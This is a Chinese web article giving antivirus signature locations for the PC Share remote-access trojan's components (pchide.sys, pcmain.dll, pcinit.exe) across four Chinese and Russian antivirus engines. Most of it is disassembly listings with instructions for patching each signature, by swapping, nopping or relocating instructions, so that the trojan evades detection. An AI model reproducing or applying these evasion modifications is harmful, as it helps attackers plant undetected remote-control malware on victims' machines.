PC Share特征码公布及修改方法pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范PC Share特征码公布及修改方法

PC Share特征码公布及修改方法


2009/2/21  编辑:佚名 来源:本站整理  关键词:

PC Share特征码公布及修改方法

 

1、定位
卡巴:
pchide.sys:
[特征] 00000986_00000001
pcmain.dll
[特征] 0000BB02_00000001
pcinit.exe
[特征] 00000825_00000001
[特征] 00001369_00000001

瑞星:
pchide.sys:
[特征] 00000D56_00000001
pcmain.dll:
[特征] 0000BB49_00000001
pcinit.exe
[特征] 00000673_00000001
[特征] 00000827_00000001
[特征] 00000D5B_00000001

金山:
pchide.sys:
[特征] 00000D3E_00000001
pcmain.dll:
反向:
[特征] 0000BAB4_00000001
[特征] 0000BABB_00000001
[特征] 0000DE28_00000001
[特征] 0000DE79_00000001
pcinit.exe:
[特征] 00001238_00000001
[特征] 00001265_00000001

江民:
pchide.sys:
[特征] 00000DAF_00000001
pcmain.dll:
[特征] 0000BB0A_00000001
pcinit.exe:
[特征] 000008BC_00000001
[特征] 00000EE4_00000001
[特征] 000012BA_00000001

########################################################################################################################
2、修改特征码:
//***********************************************************************************************************************
卡巴:
pchide.sys:
[特征] 00000986_00000001
00010975:  FF15 20030100              CALL [10320]
0001097B:  33C0                       XOR EAX,EAX
0001097D:  EB 11                      JMP SHORT 00010990
0001097F:  50                         PUSH EAX
00010980:  33C0                       XOR EAX,EAX       //nop掉
00010982:  33C0                       XOR EAX,EAX
00010984:  0F84 03000000              JE 0001098D
0001098A:  55                         PUSH EBP
0001098B:  8211 58                    ADC BYTE PTR [ECX],58
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll
[特征] 0000BB02_00000001
1000BAF9:  EB 4E                      JMP SHORT 1000BB49
1000BAFB:  57                         PUSH EDI
1000BAFC:  56                         PUSH ESI
1000BAFD:  53                         PUSH EBX
1000BAFE:  E8 FDF8FFFF                CALL 1000B400     //2、改1000B400为:1000B3F8
1000BB03:  83FE 01                    CMP ESI,1

1000B3F8                                                //1、将1000B400处代码移到此处

1000B3FE:  90                         NOP
1000B3FF:  90                         NOP
1000B400:  8B4424 08                  MOV EAX,[ESP+8]
1000B404:  81EC 24050000              SUB ESP,524
1000B40A:  83F8 01                    CMP EAX,1
1000B40D:  56                         PUSH ESI
1000B40E:  57                         PUSH EDI
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe
[特征] 00000825_00000001  00401425
0040081D:  FFD6                       CALL NEAR ESI
0040081F:  6A 06                      PUSH 1            //
00400821:  58                         POP EAX
00400822:  5F                         POP EDI
00400823:  5E                         POP ESI
00400824:  5B                         POP EBX
00400825:  C9                         LEAVE
[特征] 00001369_00000001  00401F69
该处的call调用, 进入到call内如下, 把其中上面的四句移到空白区域, 之后修改call调用地址, 免杀!

00401429  /$  55                    push    ebp
0040142A  |.  8BEC                  mov     ebp, esp
0040142C  |.  81EC 00010000         sub     esp, 100
00401432  |.  80A5 00FFFFFF 00      and     byte ptr [ebp-100], 0
00401439  |.  56                    push    esi
0040143A  |.  57                    push    edi

55 8B EC 81 EC 00 01 00 00 80 A5 00 FF FF FF 00

00401FDB      00                    db      00
00401FDC      00                    db      00

//***********************************************************************************************************************
瑞星:
pchide.sys:
[特征] 00000D56_00000001
00010D4C:  6A 3B                      PUSH 3B
00010D4E:  59                         POP ECX
00010D4F:  33C0                       XOR EAX,EAX          //sub eax,eax
00010D51:  8DBD 02FEFFFF              LEA EDI,[EBP-1FE]
00010D57:  F3                         REP STOS DWORD PTR ES:[EDI]
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll:(就在这一段的起始详细位置, 有个跳转跳到1000BB49处, 将此处上一句的xor eax, eax nop掉就ok了……)
[特征] 0000BB49_00000001              1000C749
1000BB3A:  85C0                       TEST EAX,EAX
1000BB3C:  74 08                      JE SHORT 1000BB46
1000BB3E:  57                         PUSH EDI
1000BB3F:  56                         PUSH ESI
1000BB40:  53                         PUSH EBX
1000BB41:  FFD0                       CALL EAX
1000BB43:  8945 0C                    MOV [EBP+C],EAX
1000BB46:  8B45 0C                    MOV EAX,[EBP+C]
1000BB49:  5F                         POP EDI
1000BB4A:  5E                         POP ESI
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe
[特征] 00000673_00000001  00401273
00400664:  56                         PUSH ESI
00400665:  8B31                       MOV ESI, [DWORD DS:ECX]
00400667:  57                         PUSH EDI
00400668:  66:8B7C24 0C               MOV DI, [WORD SS:ESP+C]
0040066D:  66:893C96                  MOV [WORD DS:ESI+EDX*4], DI
00400671:  8B31                       MOV ESI, [DWORD DS:ECX]
00400673:  0FB710                     MOVZX EDX, [WORD DS:EAX]       //与上一行交换详细位置
00400676:  66:8B7C24 10               MOV DI, [WORD SS:ESP+10]
[特征] 00000827_00000001  00401427
0040081D:  FFD6                       CALL NEAR ESI
0040081F:  6A 06                      PUSH 6                   //此处就在修改卡巴时已经修改过了:本来为:push 1
00400821:  58                         POP EAX
00400822:  5F                         POP EDI
00400823:  5E                         POP ESI
00400824:  5B                         POP EBX
00400825:  C9                         LEAVE
00400826:  C2 0C00                    RETN C
[特征] 00000D5B_00000001  0040195B
00400D30:  FF15 34204000              CALL NEAR [DWORD DS:402034]
00400D36:  8BF8                       MOV EDI, EAX
00400D38:  897D EC                    MOV [DWORD SS:EBP-14], EDI
00400D3B:  FF15 38204000              CALL NEAR [DWORD DS:402038]
00400D41:  3D B7000000                CMP EAX, B7
00400D46:  0F84 E1020000              JE 0040102D
00400D4C:  68 30750000                PUSH 7530
00400D51:  57                         PUSH EDI
00400D52:  FF15 6C204000              CALL NEAR [DWORD DS:40206C]
00400D58:  85C0                       TEST EAX, EAX              //改为:and  eax,eax
//***********************************************************************************************************************
金山:
pchide.sys:
[特征] 00000D3E_00000001
00010D2A:  73 00                      JNB     SHORT 00010D2C
00010D2C:  5C                         POP     ESP
00010D2D:  0000                       ADD     [EAX],AL
00010D2F:  0055 8B                    ADD     [EBP-75],DL
00010D32:  EC                         IN      AL,DX
00010D33:  81EC 18020000              SUB     ESP,218
00010D39:  56                         PUSH    ESI
00010D3A:  57                         PUSH    EDI
00010D3B:  BE 020D0100                MOV     ESI,10D02
00010D40:  8DBD F0FDFFFF              LEA     EDI,[EBP-210]   //和上一行交换详细位置!
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll:
反向:
[特征] 0000BAB4_00000001
1000BAB3:  55                         PUSH EBP
1000BAB4:  8BEC                       MOV EBP,ESP  //与下面一行互换, 之后后面的EBP+8等都再加4
1000BAB6:  53                         PUSH EBX
1000BAB7:  8B5D 08                    MOV EBX,[EBP+8]
1000BABA:  56                         PUSH ESI
[特征] 0000BABB_00000001           //上一个已经改了, 就在一起

[特征] 0000DE28_00000001              //这两处直接改大小写就ok了……(大写+20h=小写)
[特征] 0000DE79_00000001
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe:
[特征] 00001238_00000001  00401E38
[特征] 00001265_00000001  00401E65
00401259:  8965 E8                    MOV [EBP-18],ESP
0040125C:  33DB                       XOR EBX,EBX
0040125E:  895D FC                    MOV [EBP-4],EBX
00401261:  6A 02                      PUSH 2
00401263:  FF15 8C204000              CALL [40208C]

//***********************************************************************************************************************
江民:
pchide.sys:
[特征] 00000DAF_00000001
00010D96:  59                         POP     ECX
00010D97:  59                         POP     ECX
00010D98:  8D85 F0FDFFFF              LEA     EAX,[EBP-210]
00010D9E:  50                         PUSH    EAX
00010D9F:  8D45 F8                    LEA     EAX,[EBP-8]
00010DA2:  50                         PUSH    EAX
00010DA3:  FF15 10030100              CALL    NEAR [10310]
00010DA9:  68 200F0100                PUSH    10F20
00010DAE:  8D85 F8FEFFFF              LEA     EAX,[EBP-108]     //将这一行与上面一行互换
00010DB4:  50                         PUSH    EAX
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll:
[特征] 0000BB0A_00000001
1000BAF7:  90                         NOP
1000BAF8:  90                         NOP
1000BAF9:  EB 4E                      JMP SHORT 1000BB49
1000BAFB:  57                         PUSH EDI
1000BAFC:  56                         PUSH ESI
1000BAFD:  53                         PUSH EBX
1000BAFE:  E8 F5F8FFFF                CALL 1000B3F8
1000BB03:  83FE 01                    CMP ESI,1
1000BB06:  8945 0C                    MOV [EBP+C],EAX          //与上面一句互换详细位置!
1000BB09:  75 0C                      JNZ SHORT 1000BB17
1000BB0B:  85C0                       TEST EAX,EAX
1000BB0D:  75 37                      JNZ SHORT 1000BB46
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe:
[特征] 000008BC_00000001  004014BC

[特征] 00000EE4_00000001  00401AE4
00400EC3:  50                         PUSH EAX
00400EC4:  8D86 06080000              LEA EAX,[ESI+806]
00400ECA:  50                         PUSH EAX
00400ECB:  FFD3                       CALL EBX
00400ECD:  8D86 06080000              LEA EAX,[ESI+806]
00400ED3:  68 78304000                PUSH 403078
00400ED8:  50                         PUSH EAX
00400ED9:  FFD3                       CALL EBX
00400EDB:  8D8D 34FEFFFF              LEA ECX,[EBP-1CC]
00400EE1:  8D86 06090000              LEA EAX,[ESI+906]
00400EE7:  51                         PUSH ECX
00400EE8:  50                         PUSH EAX
[特征] 000012BA_00000001  00401EBA         //转移
00401EB8  |.  59                    pop     ecx
00401EB9  |>  E8 E2000000           call    00401FA0
00401EBE  |.  68 0C304000           push    0040300C

00401FA0  /$  68 00000300           push    30000                                     ; /CWmask = 30000
00401FA5  |.  68 00000100           push    10000                                     ; |CWnew = 10000
00401FAA  |.  E8 0D000000           call    <jmp.&MSVCRT._controlfp>                  ; \_controlfp
00401FAF  |.  59                    pop     ecx
00401FB0  |.  59                    pop     ecx
00401FB1  \.  C3                    retn

68 00 00 03 00 68 00 00 01 00

00401FF2      68 00000300           push    30000

相关文章
  • VMware和Virtual PC大比拼
  • DNF欲望之塔从哪里进 欲望之塔npc是什么东东
  • 魔之符咒6.81名人堂密码魔之符咒6.81隐藏npc在哪里攻略
  • PCB简介及PCB优势概述
  • dnf时空石在哪里兑换 NPC红尾乔纳森可以兑换什么
  • 三国志13威力加强版NPC武将威名升级规律 三国志13攻略
  • DNF怪盗小姐npc在哪 怪盗小姐npc位置介绍
  • 猎天使魔女pc版使用PS4手柄方法分享
  • dnf暗黑城老林煎饼摊在哪 林大叔NPC坐标位置
  • dnf4.13更新后神秘人在哪里 黑衣人NPC送的箱子里面有什么
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图